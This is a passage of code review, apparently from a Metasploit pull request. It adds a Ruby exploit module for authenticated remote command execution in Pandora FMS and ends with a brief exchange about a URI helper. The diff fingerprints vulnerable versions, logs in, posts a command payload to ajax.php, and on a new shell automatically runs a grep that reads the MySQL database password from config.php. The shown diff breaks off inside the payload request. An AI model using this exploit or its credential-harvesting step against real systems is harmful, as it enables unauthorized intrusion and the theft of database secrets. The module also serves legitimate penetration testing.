modules/exploits/linux/http/pandora_fms_events_exec.rb

```diff
@@ -0,0 +1,221 @@
+    vprint_status('Running check')
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')
+
+    unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
+      return CheckCode::Safe('Target is not a Pandora FMS application.')
+    end
+
+    @cookie = res.get_cookies
+    html = res.get_html_document
+    full_version = html.at('div[@id="ver_num"]').text
+
+    if full_version.blank?
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = full_version[1..-1].gsub!('NG', '')
+
+    if version.blank?
+      return CheckCode::Detected('Could not determine the Pandora FMS version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('7.0.744')
+      return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")
+    end
+
+    CheckCode::Appears("Target is Pandora FMS version #{full_version}.")
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @cookie,
+      'vars_get' => { 'login' => '1' },
+      'vars_post' => {
+        'nick' => user,
+        'pass' => pass,
+        'login_button' => 'Login'
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 302
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    if res.headers['Location'].to_s == ''
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => res.headers['Location'],
+      'cookie' => @cookie
+    })
+
+    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}."
+  end
+
+  def on_new_session(client)
+    super
+    if target.arch.first == ARCH_CMD
+      print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
+      client.shell_write("grep dbpass include/config.php\n")
+    else
+      print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status('Executing payload...')
+    referer_url = normalize_uri(target_uri.path, 'index.php')
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ajax.php'),
+      'cookie' => @cookie,
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'Referer' => "http://#{datastore['RHOSTS']}#{referer_url}",
```

Comment:
Would `full_uri` work here? Maybe `full_uri('index.php')`.

Reply:
yep that works! didn't know about this option